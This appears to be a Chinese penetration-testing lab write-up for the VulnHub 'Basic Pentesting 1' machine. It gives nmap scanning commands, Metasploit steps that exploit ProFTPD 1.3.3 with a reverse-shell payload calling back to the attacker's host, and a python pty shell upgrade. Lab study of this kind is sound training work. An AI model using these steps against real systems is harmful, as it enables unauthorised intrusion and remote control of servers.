信息收集:
靶机地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download
(1)ip扫描
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:A3:86:A0'

(2)端口扫描
nmap -p- -A 192.168.254.138

getshell:
(1)根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内

(2)先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)
search proftpd 1.3.3

(3)由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;

(4)然后查看要设置的参数(show options)
set payload cmd/unix/reverse
set rhosts 192.168.254.138 #靶机ip
set lhost 192.168.254.129 #kali的ip
run

提权:
(1)查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

(2)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)
python3 -c 'import pty;pty.spawn("/bin/bash")'
